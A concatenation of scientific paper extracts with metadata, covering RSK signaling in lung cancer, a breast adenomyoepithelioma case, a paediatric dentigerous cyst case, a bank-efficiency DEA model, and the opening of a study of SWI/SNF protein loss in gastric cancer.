RSKs are an important downstream effector of the Ras-Raf-MAPK signaling pathway. They play a crucial role in the regulation of cellular proliferation, growth, and survival in a variety of tumors. Based on our recent advances in the understanding of the different isoforms of RSK and the mechanisms by which they affect tumorgenesis, invasion and metastasis these agents might prove to be promising targets in the chemotherapy of lung adenocarcinomas particularly those harboring oncogenic mutations in components of the Ras signaling pathway. | 2017-08-03T02:04:21.879Z | 2016-01-14T00:00:00.000 | {
"year": 2016,
"sha1": "26dfbd1ba1d6a5a9d05ff81fc08aca038fba8f6e",
"oa_license": "CCBY",
"oa_url": "https://translational-medicine.biomedcentral.com/track/pdf/10.1186/s12967-016-0768-1",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "665474227811b4caa336c49044f97e48e52db7aa",
"s2fieldsofstudy": [
"Biology",
"Medicine"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
72000932 | pes2o/s2orc | v3-fos-license | Malignant Adenomyoepithelioma of the Breast Presenting as a Large Mass that Grew Slowly without Metastasis
An adenomyoepithelioma (AME) is characterized by a biphasic proliferation of both epithelial and myoepithelial cells. AME has been reported to occur in breast, salivary gland, lung and skin.(1) An AME of the breast is a rare tumor and there are less than 200 such reported cases.(2, 3) Malignancy arising from AME of the breast is much rarer and only about 20 such cases have been reported in the literature.(3,4) Metastasis of an AME is unusual, but this has been reported even in benign cases.(5)The reported sizes of these tumors are most less than 5 cm. In this report, we describe a huge breast mass that was diagnosed as a malignant AME and was completely excised. CASE REPORT
INTRODUCTION
An adenomyoepithelioma (AME) is characterized by a biphasic proliferation of both epithelial and myoepithelial cells.AME has been reported to occur in breast, salivary gland, lung and skin.(1) An AME of the breast is a rare tumor and there are less than 200 such reported cases.(2,3) Malignancy arising from AME of the breast is much rarer and only about 20 such cases have been reported in the literature.(3,4) Metastasis of an AME is unusual, but this has been reported even in benign cases.(5) The reported sizes of these tumors are most less than 5 cm.In this report, we describe a huge breast mass that was diagnosed as a malignant AME and was completely excised.
CASE REPORT
A 68-yr-old woman was transferred to our clinic, for the treatment of a large mass in the right breast.She had no history of breast disease other than the mass and no history of medical diseases except hypertension.The mass had grown slowly for about 20 yr, but the patient had not sought evaluation.As the mass grew, the center of the mass became ulcerated, leading to necrosis and a skin defect, but she had continued to dress the wound herself.She visited another hospital 1 week before she was referred to our hospital.A biopsy of the mass at the other hospital revealed a chondroid syringoma.The attending physician transferred her to our clinic in the hope that she could undergo a flap procedure after resection of the mass.
The mass was 15 cm at the maximal diameter and it occupied the entire right breast (Figure 1A).The nipple and areola were absent as a result of the necrosis.The area of necrosis was approximately 8 cm at the maximal diameter.The mass was not fixed to the chest wall.No axillary lymph nodes were palpated.Neither mammography nor breast ultrasound was performed.The mass An adenomyoepithelioma (AME) is an uncommon neoplasm characterized by proliferation of both epithelial and myoepithelial cells in the salivary gland, skin, lung and breast.AMEs can recur, progress to malignancy and metastasize.A 68year-old woman presented a large mass occupying her whole right breast.The mass had grown slowly for about 20 years and the preoperative biopsy of the mass was chondroid syringoma.The mass was completely resected and the postoperative biopsy revealed malignant AME with a negative resection margin.The patient didn't receive any adjuvant therapy and has been free of recurrence or metastasis up to now.We report herein a case of a malignant AME that was diagnosed in the largest breast mass reported to date.This mass grew slowly and without metastasis.Clinicians should consider this rare disease entity in the differential diagnosis of a breast mass and remember the importance of complete excision of this tumor.
had an opaque lesion on the chest X-ray.The pathologist at our hospital reviewed the slide of the biopsy specimen and made the diagnosis of myoepithelioma: no malignant component was not identified on the slide.
We performed a total mastectomy of the right breast.
The skin was closed by primary repair after undermining without a flap procedure (Figure 1B).Grossly, the tumor was a multinodular solid mass with focal cystic change.
The cut surface was pale yellow, soft to fish-flesh and partly myxoid.It involved the overlying skin, and this resulted in skin ulceration (Figure 2).Microscopic examination showed a proliferation of epithelial cells invested by myoepithelial cells, forming a tubular or trabecular growth pattern (Figure 3).Multiple foci of the tumor showed cytologic atypia, increased mitotic activity and overgrowth of the glandular component (Figure 4).The final pathologic diagnosis was malignant AME.A negative resection margin was confirmed by the pathologic examination.
Immunohistochemical study demonstrated that the myoepithelial cells were reactive for smooth muscle actin (Figure 5), p63 and cytokeratin 5/6, partly reactive for S-100 protein and negative for cytokeratin 7 and carcinoembryonic antigen, whereas the epithelial cells were positive for cytokeratin 7 and negative for myoepithelial markers.The Ki-67 index was increased up to 10%.The tumor cells were intermediately positive for estrogen receptor and negative for progesterone receptor and cerb-B2.
220
So-young Choi, et al. tumor that has been ever reported.In this case, the tumor was supposed to be transformed to malignancy during the growth.The reported age range at the time of diagnosis is 26-80 yr.An AME in the male breast is extremely rare and only three benign cases have been reported.(13
Figure 1 .Figure 2 .
Figure 1.The preoperative (A) and postoperative (B) appearance of the right breast.(A) The necrotized area of the central portion was broad, and it included the nipple and areola.(B) The operative wound was clean without complications after complete excision of the mass and primary repair.A B
Figure 3 .
Figure 3. Microscopic finding of the tumor.The tumor showed vaguely nodular growth of proliferating epithelial cells invested by myoepithelial components forming tubules or trabeculae (H&E stain, ×40).
Figure 4 .
Figure 4. Microscopic finding of the tumor.Cytologic atypia with increased mitotic activity was evident in multiple foci of the glands (H&E stain, ×400).
The overall prognosis of AME is not known due to the rarity of the disease.An AME is a rare breast tumor with various clinical manifestations.We report here on a case of a malignant AME that presented as a large tumor of the breast without distant metastasis; the tumor was completely excised and we misdiagnosed it preoperatively.Clinicians need to be aware of AMEs as part of the differential diagnosis of breast tumors, and they must aware of the importance of complete excision because of the tumor' s potential for recurrence and metastasis.Although surgery is the only proven treatment modality, treatment that includes chemotherapy, hormone therapy and radiation therapy may contribute to improving the prognosis of this disease entity.
(4))erapy has been tried, but it is not effective.(12)Theeffects of hormone therapy and radiotherapy are not proven.In the case of distant metastasis, local recurrence from incomplete excision is more common, and this contributes to a poor prognosis.(4) | 2018-06-16T13:29:48.400Z | 2009-09-01T00:00:00.000 | {
"year": 2009,
"sha1": "c1735e6ed8d8d6665db6e97ea18545894c6a429f",
"oa_license": "CCBYNC",
"oa_url": "https://doi.org/10.4048/jbc.2009.12.3.219",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "c1735e6ed8d8d6665db6e97ea18545894c6a429f",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
21879752 | pes2o/s2orc | v3-fos-license | Management of a Dentigerous Cyst in a Child with Robin Sequence
This is a brief clinical report describing an 18-month-old female with Robin sequence found to have an incidental mandibular cystic lesion on a head computed tomography scan in the preoperative workup before performing mandibular distraction. She underwent enucleation of the tumor, which was found to be a dentigerous cyst. One year following cyst enucleation, mandibular distraction was performed in order to alleviate her tongue-based obstruction. This case demonstrates the ability of the mandibular bone to successfully regenerate after undergoing cyst enucleation.
INTRODUCTION
Dentigerous cysts (DCs) are the second most common type of odontogenic (developmental) cyst arising in the jaw [1]. They are defined as cystic lesions that develop around the crown of an unerupted tooth, in which follicle expansion allows for fluid accumulation. Also known as follicular cysts, DCs account for approximately 24% of true jaw cysts [2].
The most commonly affected teeth are the mandibular third molars and the maxillary canines, which may be explained by the tendency of these teeth to present with impaction [3]. DCs have a slight male predominance, and are most likely to occur during the second and third decades of life [4]. DCs diagnosed during childhood are rare, with most cases in the literature described in small series or case reports [4]. DCs are usually solitary in nature. When presenting as bilateral or multiple cysts, they are usually associated with syndromes such as mucopolysaccharidosis, basal cell nevus syndrome, or cleidocranial dys-plasia [5].
Another uncommon jaw anomaly found in infancy is Robin sequence (RS). RS is characterized by micrognathia, cleft palate, and glossoptosis. The treatment of this condition frequently utilizes distraction osteogenesis to correct micrognathia. We present a brief clinical report of an incidental dentigerous cyst in a child with RS and its surgical management.
CASE
An 18-month-old female previously had a tracheostomy placed in infancy to treat an airway obstruction secondary to RS. The recommendation was to first correct the cleft palate, followed by mandibular distraction in order to decannulate the child.
The cleft palate was closed at 19 months of age. A 2-flap palatoplasty with levator retropositioning was performed. The patient's postoperative course was uneventful. Two months following cleft palate closure, the patient was re-evaluated for man-dibular distraction. A preoperative computed tomography (CT) scan demonstrated an incidental cystic lesion of the left mandibular ramus measuring 3.9 cm in length and 2.2 cm in the transverse dimension with a floating molar tooth. The mass was unilocular and distorted both cortices of the mandible. It appeared to be emanating from the second molar on the left side and extended to the level of the condyle. In order to obtain a definitive diagnosis, the decision was made to enucleate the mass.
At the age of 25 months, the patient underwent enucleation of the mandibular cyst. A subperiosteal exposure was performed. Upon making the osteotomy, copious amounts of yellow-colored, almost purulent fluid were expressed. The mass had obliterated both cortices of the bone. The floating teeth and surrounding bone were removed and curetted. The periosteum was intact and the only portion of viable bone was along the posterior border of the ramus. No bone grafting was performed (Figs. 1A, 2A). The intraoral incision healed without any complications and observation was recommended.
Surgical pathology identified the mass as a dentigerous cyst. Multiple sections revealed a cyst composed of dense fibrous tissue lined by squamous epithelium. Ameloblastic epithelium was not identified, and there was no evidence of carcinoma. Culture of the cyst aspirate showed the growth of many beta-hemolytic group F streptococci and possible anaerobic species. Also present were 2 molar-like tooth structures, which measured 1.1 cm × 1.0 cm × 0.6 cm and 1.1 cm × 0.9 cm × 1.2 cm, with the crown aspect of 1 of them projecting into the lumen of the cyst.
At 3 and a half years of age, the patient continued to demon-strate an inability to tolerate capping of the tracheostomy. An approximately 16-mm overjet was present centrally. The tongue remained posteriorly displaced. A CT scan showed a regenerated mandibular ramus that could accommodate a distraction (Figs. 1B, 2B). At that time, the patient underwent successful bilateral mandibular osteotomy and distraction. Approximately 2.5 months later, the internal distractors were removed. Two months later, she was decannulated. A follow-up CT scan performed 2 years postoperatively demonstrated bone stock after distraction (Fig. 2C).
DISCUSSION
The various theories on the histogenesis of dentigerous cysts include developmental and inflammatory origins. The developmental origin is associated with an unerupted tooth exerting pressure on a follicle, impeding venous return, and in turn allowing for cystic fluid accumulation to develop between the reduced enamel epithelium. It has also been suggested that the inflammation of deciduous teeth in nearby proximity to an unerupted tooth can trigger cyst formation. This process is usually seen in the first and second decades of life [6]. Nevertheless, DCs do occur in childhood, although they are uncommon. Only 9.1% of DCs occur in the 6-to 7-year-old population [7]. The diagnosis of a DC in our patient at 21 months represents one of the few diagnoses to be reported in the literature in such a young patient [8]. Most commonly, DCs present as asymptomatic mandibular swellings, but they may also present with unilateral jaw pain when they are inflammatory in nature. In this patient, the DC was incidentally found on a preoperative CT scan in anticipation of mandibular distraction. In a retrospective review of prior imaging, evidence of the lesion was identified. An approximately 14-mm unilocular lucency in the left mandible was present on a chest X-ray for tracheostomy placement at 13 months of age (Fig. 3). All other imaging prior to this date did not elucidate the mandible well.
It is difficult to discern the origin of the cyst in this patient. The lower second molars typically erupt at 23-31 months [9]. It is possible that the unerupted tooth in this location exerted pressure on an impacted follicle, leading to fluid accumulation and eventual cyst formation. With evidence of the cyst on imaging at 13 months, a developmental origin could explain its presence. The other possibility would be an inflammatory origin. Our patient had been admitted for multiple upper respiratory tract infections requiring intensive care unit hospitalization. The final pathology report demonstrated the presence of beta-hemolytic group F streptococci, suggesting an underlying infection. It is possible that the underlying inflammation of a non-vital deciduous tooth or infection from another source spread to involve the follicle of an unerupted tooth, resulting in inflammatory debris and eventual cyst formation [6].
Radiographically, DCs appear as a well-defined unilateral radiolucency surrounding the crown of an unerupted tooth. A follicular space of > 4 mm is suspicious for an underlying cyst. Other odontogenic lesions exist, with similar radiographic findings. The differential diagnosis includes radicular cysts, ameloblastoma, squamous cell carcinoma, chondrosarcoma, osteosarcoma, cementoblastoma, and Pindborg tumor. The complications that can arise from untreated DCs include: pathologic bone fracture/destruction, loss of permanent teeth, and permanent bone deformation, leading to facial asymmetry and the displacement of teeth [10]. Debate currently centers around whether marsupialization or enucleation is the best treatment modality in the management of DCs. Enucleation is the treatment of choice, in which the cyst and all of its contents are removed in toto. This is the preferred method if supernumerary teeth are involved, and if this is the case, the unerupted tooth is also removed. The disadvantages of enucleation include the potential to affect budding teeth, especially in children. Therefore, marsupialization is often the preferred method in children, as the loss of permanent tooth buds can be prevented [4]. This
Fig. 3. Incidental finding of dentigerous cyst
Chest X-ray for tracheostomy placement demonstrating a 14-mm unilocular lucency in the left mandible at 13 months of age. The red arrow marks the cyst.
Fig. 2. CT scan before and after mandibular distraction
(A) Computed tomography (CT) scan demonstrating a large cystic lesion of the left mandibular ramus. The cyst is shown by an red arrow. (B) CT scan at the age of 3.5 years (18 months after enucleation) demonstrating loss of second molar but adequate bone formation. (C) CT scan performed 2 years after bilateral mandibular osteotomy and distraction.
A B C
more conservative approach involves decompressing the cyst and suturing its lining to the oral mucosa to allow for continuous drainage. The obvious disadvantage of this technique is the potential for cyst recurrence as well as for pathologic tissue to be left in situ [11]. Our patient presented a unique challenge in that the cyst was quite large (4 cm) and had replaced almost all of the mandibular ramus. It was apparent that the mass had obliterated the bone, on both the lingual and buccal cortices. Fortunately, after the mass was removed, viable bone was present along the posterior edge of the ramus connecting to the body and condyle, and the periosteum was intact.
Spontaneous regeneration of the mandible is an infrequent response that has been reported in the literature. While the exact mechanism is not fully understood, some of the factors thought to contribute to bone formation include the presence of an intact periosteum, age of the patient, infection, and immobility [12].
The presence of an intact periosteum is perhaps one of the most important factors contributing to osteogenesis. The periosteum is a layer of dense connective tissue that is attached to the adjacent bone via stable collagenous fibers known as Sharpey fibers. It consists of 2 layers: an outer fibrous layer and an inner cambium layer. The outer layer consists of fibroblasts and a vascular network. The inner layer contains osteoblasts, which play a crucial role in stimulating osteogenesis. When the periosteum is stripped from the bone, it is this layer, along with its osteogenic cells, that can provide a scaffold to promote spontaneous bone regeneration and healing [13].
The age of the patient is another important factor that contributes to mandibular bone regeneration. The majority of reported cases have been in young patients. The younger the patient, the more dense and vascular the periosteum. Increased vascularity brings the potential of improved osteogenesis. Incidentally, infection is also thought to jumpstart osteoblasts into triggering osteogenesis [14]. This corresponds to what took place in our patient, who was found to have an underlying infection in the cyst. Finally, immobilization has been predicted to contribute to bone formation [15]. A posterior edge of bone did remain present along the ramus, and would have provided the appropriate stabilization necessary for osteogenesis to occur.
Our patient underwent enucleation in the setting of known plans for mandibular distraction for RS. Initial follow-up X-rays did demonstrate thinning of the lateral cortex of the ramus, but this improved with time. CT imaging performed nearly 18 months after cyst enucleation demonstrated good overall bone formation (Fig. 2B). More impressive was the ability of the bone to regenerate following distraction. This case demonstrates the ability of the mandible to successfully regenerate after extensive cyst enucleation and bone removal, most likely secondary to an intact periosteum. It emphasizes the capacity of the pediatric population to undergo enucleation and also suggests that clinicians can be relatively aggressive in the surgical management of DCs when necessary.
In conclusion, DCs are benign mandibular cysts infrequently seen in the younger population. When a unilocular radiolucency is seen on imaging, the differential diagnosis should be broad and include possible malignant etiologies. Enucleation is the preferred treatment and may be employed even in instances where future mandibular distraction may be needed, such as in the case of patients with RS. | 2018-04-03T02:26:42.884Z | 2017-09-01T00:00:00.000 | {
"year": 2017,
"sha1": "c4a6c566ac0dc2791e872afcd856039728acde39",
"oa_license": "CCBYNC",
"oa_url": "http://www.e-aps.org/upload/pdf/aps-2017-44-5-434.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "c4a6c566ac0dc2791e872afcd856039728acde39",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
234904255 | pes2o/s2orc | v3-fos-license | Two-stage DEA for Bank Efficiency Evaluation Considering Shared Input and Unexpected Output Factors
. With the increasingly fierce market competition, only by relying on high-quality products and high customer satisfaction can enterprises survive in the fierce competition. Among many evaluation methods, Data Envelopment Analysis (DEA), as a non-parametric statistical method to effectively deal with multi-input and multi-output problems, has received more and more attention in evaluating the relative efficiency of decision-making units. In the process of bank efficiency evaluation based on DEA method, there will be a situation that banks have both dual role factors and unexpected output factors. The Two-stage DEA model provides an effective analysis method to solve the problem of bank efficiency evaluation of complex organizational structure. In order to evaluate the efficiency of unexpected output with uncertain information, a stochastic DEA model of unexpected output is established.
Introduction
With the increasingly fierce market competition, only by relying on high-quality products and high customer satisfaction can enterprises survive in the fierce competition. The evaluation and selection of bank efficiency is a process of selecting the bank with the best efficiency by comprehensively comparing the capital turnover and customer satisfaction of the bank, which is a typical multi-objective and multi-criteria decision-making problem [1]. Whether it is an enterprise as a node in the supply chain or a non-profit organization such as government, hospital and school, it is highly dependent on the success of the bank efficiency evaluation and selection process [2]. In reality, the value of bank efficiency evaluation criteria may not only be accurate quantitative value, but also inaccurate estimation value, ordinal value and language variable value [3]. Due to the extreme importance of bank efficiency evaluation and selection, relevant decisions have attracted extensive attention and research. Among many evaluation methods, Data Envelopment Analysis (DEA), as a non-parametric statistical method for effectively dealing with multi-input and multi-output problems, has received more and more attention in evaluating the relative efficiency of decision-making units [4]. The traditional DEA models are all based on deterministic problems, but in actual life, the interference of factors such as measurement and randomness of economic laws will produce inaccurate data problems.
Bank efficiency has an important impact on the performance of core enterprises and the entire supply chain, so it is necessary to establish an efficient and realistic model of bank efficiency evaluation and selection. Data envelopment analysis, as a non-parametric statistical method to effectively deal with multi-input and multi-output problems, is suitable for the same type of effectiveness evaluation with multiple inputs and outputs, and has outstanding advantages in solving bank selection problems [5]. Because fuzzy mathematics has the advantage of mathematically expressing uncertainty and ambiguity in generating decisions using approximate and uncertain information, and provides many formal tools with inherent inaccuracies, so in dealing with fuzzy index values On the issue of bank efficiency evaluation, fuzzy DEA has unparalleled advantages [6]. The advantages of DEA in the evaluation of bank efficiency are obvious. It can process multiple indicators at the same time without the need to give weights in advance, especially after the evaluation, the direction of bank improvement can be obtained by projection [7]. When using DEA to evaluate bank efficiency, it is necessary to first determine the input elements and output elements. Although the positioning of some elements is obvious, it is confusing when determining whether some elements are input or output [8]. The two-stage DEA model provides an effective analysis method for solving the problem of bank efficiency evaluation of complex organizational structures.
DEA Model Introduction and Efficiency Evaluation
In the process of production practice, producers of course want to use as little input as possible and get as much output as possible. As long as there are dual role elements in the system, the system can certainly be decomposed into multiple subsystems. In the use of DEA method, it is generally assumed that the less input, the better output, which in fact assumes that all outputs are expected by decision makers. In actual production activities, input and output have different positions and functions. In order to make comparison and evaluation, input data and output data must be integrated. Therefore, an analysis and evaluation method that can effectively integrate input and output data needs to be found. The production system containing dual role elements is decomposed into a plurality of subsystems, wherein the dual role elements are intermediate variables between the two subsystems. In the actual multi-stage complex network production process, unexpected outputs such as environmental pollutants often occur [9]. At this time, the technology that can simultaneously produce more expected output and less unexpected output with relatively less resource input can be used as a criterion to measure whether the production decision-making unit is effective. In the traditional DEA model, since all outputs are actually assumed to be expected outputs, the ineffectiveness of the evaluated decision unit (DMU) may come from two aspects.
The traditional DEA model does not consider the internal structure of DMU and regards the whole DMU as a black box, while the two-stage DEA model tries to depict the two-stage system and find the relationship between the system and its subsystems. DEA's efficiency evaluation idea is to achieve as much output as possible with as little input as possible, and on this basis to evaluate the relative effectiveness of all decision-making units. Assuming that there are n decision units, their operations can be divided into two phases or processes, as shown in Fig. 1.
Fig. 1 Two-stage system
Suppose the production system to be processed has n decision-making unit DMUs, and each DMU has 3 input-output vectors. Respectively defined as vector matrices: the production possibility set P can be defined as: The SBM model with undesired output is: Among them, S is a relaxation variable, λ is a weight vector, and the objective function value ρ is strictly decreasing with respect to s.
In the actual production practice, you will find that the pursuit of expected output is accompanied by the production of some undesirable by-products. Of course, policymakers can simply ignore these factors when evaluating bank efficiency, but the results will be very different from the facts. During the application of the DEA method, if there are both expected output and undesired output, the processing should be different. Only after decomposing and applying the two-stage DEA method to solve the efficiency of the entire system and the efficiency of the subsystems can the efficiency of the system containing dual role elements be measured reasonably and correctly. The research of the DEA model is mainly focused on the evaluation ranking of the input and output indicators and their relative efficiency, so that the efficiency value of multiple decision-making units is inevitably. Under the DEA framework, there are many ways to deal with undesired output, such as taking undesired output as input, or performing monotonous decreasing conversion on undesired output, and then using the converted variable as output, and direction distance function method, etc.
DEA Model for Evaluating Bank Efficiency with Unexpected Output
Unexpected output exists in the bank's selection process.
Only by minimizing the unexpected output can the optimal benefit of producing as many expected outputs as possible with the least input be satisfied. There are two ways to solve the problem when there are multiple effective decision units in DEA model and all DMUs need to be fully sorted. In the new model, the decision unit can be effective as a whole only if and only if both phases are effective. The unexpected output factor is introduced into the SBM model, and the unexpected output SBM model is proposed, which not only solves the slack problem of input and output, but also solves the efficiency evaluation problem under unexpected output. Finally, the model is applied to the bank efficiency evaluation of a company.
In the actual production process, people often expect less input and unexpected output in each stage or department. The more expected output is, the better. Each department reasonably allocates resources according to its importance, so as to achieve the improvement of the overall efficiency of the decision-making unit. The whole production process is divided into k stages. In the k stage, , and the production possibility set under the premise of constant production scale returns can be expressed as: Because the performance of the whole production process of the decision-making unit is the result of the two-stage performance synthesis, the model can decompose the overall efficiency into the two-stage efficiency, which can help the management or decision-makers identify the stage where the root cause of the overall inefficiency occurs, thus taking targeted improvement and improvement measures to enhance the efficiency of the stage. For multi-variety and multi-customer production enterprises, in order to meet the needs of different customers, the enterprises must make corresponding inventories, distribute goods according to the requirements of customers for variety and quantity, and deliver them to the designated place at the designated time [10]. When the input or output is interval value, the DEA method used is called interval DEA method, in which the efficiency value of DMU is interval number. In the actual evaluation and selection of bank efficiency, the input and output data are not only accurate values, but also interval values due to the selected index attributes, incomplete information and the need for prediction.
Conclusions
The existence of unexpected output is an unavoidable fact. For any one of the fixed significance level value and the expected efficiency value, the optimal value increases with the increase of the other index, which provides more effective information for decision makers to evaluate decision units in practice. For all the existing DEA models that consider unexpected factors, the index values of the unexpected factors considered in the model must be accurate, which will inevitably make those models less practical. This paper establishes a two-stage DEA cross-efficiency bank efficiency evaluation model with dual role variables based on unexpected output factors. The evaluation and selection of bank efficiency in actual production, because of the uncertainty of some evaluation indexes or the uncertainty of evaluation indexes caused by external factors, the obtained evaluation index value is usually an interval value besides the accurate value. The new model can evaluate the overall efficiency of the decision-making unit with multi-stage production process when unexpected output occurs, and decompose it to obtain the efficiency value of each stage, thus evaluating the performance of each stage. | 2020-12-10T09:06:27.901Z | 2020-01-01T00:00:00.000 | {
"year": 2020,
"sha1": "6a5c6ea10858fbb1d0a3ded54a9835bf68f7ab9b",
"oa_license": "CCBY",
"oa_url": "https://www.e3s-conferences.org/articles/e3sconf/pdf/2020/74/e3sconf_ebldm2020_01036.pdf",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "888001133b136723ac0934d3fe42e40248994420",
"s2fieldsofstudy": [
"Economics",
"Business"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
236944869 | pes2o/s2orc | v3-fos-license | Comprehensive Immunohistochemical Study of the SWI/SNF Complex Expression Status in Gastric Cancer Reveals an Adverse Prognosis of SWI/SNF Deficiency in Genomically Stable Gastric Carcinomas
Simple Summary This study aimed to investigate the clinical relevance of immunohistochemical expression of proteins of the SWI/SNF complex, SMARCA2, SMARCA4 SMARCB1, ARID1A, ARID1B, and PBRM1 in 477 adenocarcinomas of the stomach and gastroesophageal junction. Additionally, the tumors were classified immunohistochemically in analogy to The Cancer Genome Atlas (TCGA) classification. Overall, 32% of cases demonstrated aberrant expression of the SWI/SNF complex. SWI/SNF aberration emerged as an independent negative prognostic factor for overall survival in all patients and in genomically stable patients in analogy to TCGA. In conclusion, determination of SWI/SNF status could be suggested in routine diagnostics in genomically stable tumors to identify patients who might benefit from new therapeutic options. Abstract The SWI/SNF complex has important functions in the mobilization of nucleosomes and consequently influences gene expression. Numerous studies have demonstrated that mutations or deficiency of one or more subunits can have an oncogenic effect and influence the development, progression, and eventual therapy resistance of tumor diseases. Genes encoding subunits of the SWI/SNF complex are mutated in approximately 20% of all human tumors. This study aimed to investigate the frequency, association with clinicopathological characteristics, and prognosis of immunohistochemical expression of proteins of the SWI/SNF complexes, SMARCA2, SMARCA4 SMARCB1, ARID1A, ARID1B, and PBRM1 in 477 adenocarcinomas of the stomach and gastroesophageal junction. Additionally, the tumors were classified immunohistochemically in analogy to The Cancer Genome Atlas (TCGA) classification. Overall, 32% of cases demonstrated aberrant expression of the SWI/SNF complex. Complete loss of SMARCA4 was detected in three cases (0.6%) and was associated with adverse clinical characteristics. SWI/SNF aberration emerged as an independent negative prognostic factor for overall survival in genomically stable patients in analogy to TCGA. In conclusion, determination of SWI/SNF status could be suggested in routine diagnostics in genomically stable tumors to identify patients who might benefit from new therapeutic options.
Introduction
Gastric cancer is ranked as the sixth-most-common cancer entity worldwide, having accounted for approximately 780,000 cancer-associated deaths in 2018 [1]. So far, the best parameter for predicting prognosis and, therefore, therapy in gastric-cancer patients is TNM staging. The factors that are relevant for determining the prognosis of gastric carcinomas are local infiltration depth, locoregional lymph node involvement, distant metastases, and vascular invasion [2][3][4]. Additionally, diffuse Laurén subtype and proximal tumor localization are also known negative prognostic factors [5][6][7]. The introduction of perioperative chemotherapy after 2005 has improved the outcome in stage two and three gastric cancers, with a median survival of 50 months vs. 34 months [8]. However, the prognosis of gastric cancer is still poor and has a five-year-survival rate that has not changed during the period between 2000 and 2014, with survival rates being between 31.4% and 33.5% in Germany [9].
Two generally accepted molecular classifications have been proposed for gastric carcinomas, which have both prognostic and therapeutic implications, namely The Cancer Genome Atlas (TCGA) and the Asian Cancer Research Group (ACRG) classification [10,11]. So far, only a few prognostic and therapeutic biomarkers have been identified for gastric cancer. To date, the most important therapeutic marker in gastric carcinoma is HER2 overexpression [12]. In addition, MSI status and high PDL1 expression are independent positive prognostic factors in gastric carcinoma [13][14][15], while aberrant E-cadherin expression is considered an unfavorable prognostic factor and even a negative predictive factor for chemotherapy response [16].
SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 are subunits of the Switch/Sucrose non-fermenting (SWI/SNF) complex, which show frequent alterations in rhabdoid tumors, ovarian clear cell carcinomas (OCCCs), and small-cell carcinoma of the ovary, hyper-calcemic type (SCCOHT) [17,18]. Numerous studies have demonstrated that this complex plays a role in tumor suppression in human cancers. Mutations or deficiencies of one or more subunits can have an oncogenic effect and influence the development, progression, and eventual therapy resistance of tumor diseases [18][19][20]. A few studies have also already demonstrated loss or heterogeneous expression patterns of these subunits in gastric carcinoma, which could make them potential starting points for new therapeutic concepts [21][22][23][24][25].
The aim of this retrospective study was to determine whether and to what extent molecular aberrations of SWI/SNF complex subunits play a role in gastric cancer in a large Western cohort. For this purpose, we evaluated the frequency, association with clinicopathological characteristics, and prognosis of alterations in SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 in 477 carcinomas of the stomach and gastroesophageal junction. In addition, association with the subgroups of the molecular TCGA classification was investigated. Furthermore, determination of SWI/SNF status was reduced to SMARCA2, SMARCA4, SMARCB1, and ARID1A expression to facilitate applicability in routine diagnostics.
Patients
Surgical resection specimens from 511 patients with adenocarcinomas of the stomach and the gastroesophageal junction that were treated between 2005 and 2018 at the Department of Visceral Surgery of the University Hospital Augsburg were included in the study (AEGII and III according to Siewert and Stein [26]). Tumors from 34 patients were excluded from the study, because of low tumor percentage on the tissue microarray (TMA) and the final cohort consisted of 477 tumors. Of these, 347 tumors were treated with surgery alone, and 130 patients received neoadjuvant chemotherapy. Detailed clinical characteristics are summarized in Table 1. Response to preoperative chemotherapy was determined histopathologically and was classified into three tumor regression grades (TRGs): TRG1b, TRG2, and TRG3, which corresponded to <10%, 10-50%, and >50% residual tumor cells [27]. Patients with TRG1b were classified as responders and with TRG2 and TRG3 as non-responders. Patients were treated with platinum/5-fluorouracil (5FU)-based chemotherapeutic regimes (Table 1). All surgical approaches included an abdominal D2-lymphadenectomy [28].
Follow-up data were obtained from the tumor data management of the University Hospital of Augsburg. Median follow-up was calculated by the inverse Kaplan-Meier method [29]. The primary endpoint of the study was overall survival (OS), which was defined as the time between the date of diagnosis and death by any cause.
The study was approved by the Institutional Review Board at the Ludwig-Maximilians-University of Munich (reference: 20-0922) and was performed in accordance with the Declaration of Helsinki.
Tissue Microarray Construction
All eligible histological sections were first re-evaluated using a light microscope (Olympus, Shinjuku, Japan) to verify the diagnosis. Representative slides of each tumor were digitalized using a Pannoramic SCAN II scanner (3DHISTECH, Budapest, Hungary), and five areas, consisting of normal tissue (1×), central tumor (2×), and tumor invasion front (2×), were selected. Based on the marked areas, formalin-fixed, paraffin-embedded (FFPE) tumor samples were subsequently automatically assembled into a tissue microarray (TMA) using a TMA Grandmaster (3DHISTECH, Budapest, Hungary) with a core size of 1 mm.
Immunohistochemistry and In Situ Hybridization
Immunohistochemical staining was performed on 2 µm sections from each TMA using primary antibodies listed in Supplementary Table S1. For PMS2, E-cadherin, CK7, CK20, CDX2, and EMA, a Ventana BenchMark ULTRA platform with an iVIEW DAB detection system was used (Roche, Mannheim, Germany). Staining for p53, SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, PBRM1, and MSH6 was performed on a BOND Rx platform with a BOND Polymer Refine Detection kit (Leica Biosystems, Nussloch, Germany). EBVpositive (EBV + ) cases were identified by chromogenic in situ hybridization (EBER-CISH) likewise with the Ventana BenchMark ULTRA platform (Roche, Mannheim, Germany). Adequate controls were used for quality control of staining.
The stained sections were again digitalized, and the evaluation was performed with 3DHISTECH Casviewer (3DHISTECH, Budapest, Hungary) by one pathologist (Bianca Grosser) and one trained researcher (Marie-Isabelle Glückstein.). Discrepant cases were discussed with a senior pathologist (Bruno Märkl), and a consensus was established. The investigators were blinded both to the clinicopathological data and outcome.
Immunohistochemical expression of SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 was classified as retained, reduced, loss, or hybrid-loss [21]. A strong homogeneous nuclear staining of non-neoplastic cells served as internal control. Reduced expression was defined as homogenous, very weak, but still recognizable, staining compared to normal cells. Tumors with hybrid loss showed loss of expression only in a subset of cells. Specimens lacking strong staining in the background of normal cells were not assessed [21,30].
TCGA Classification
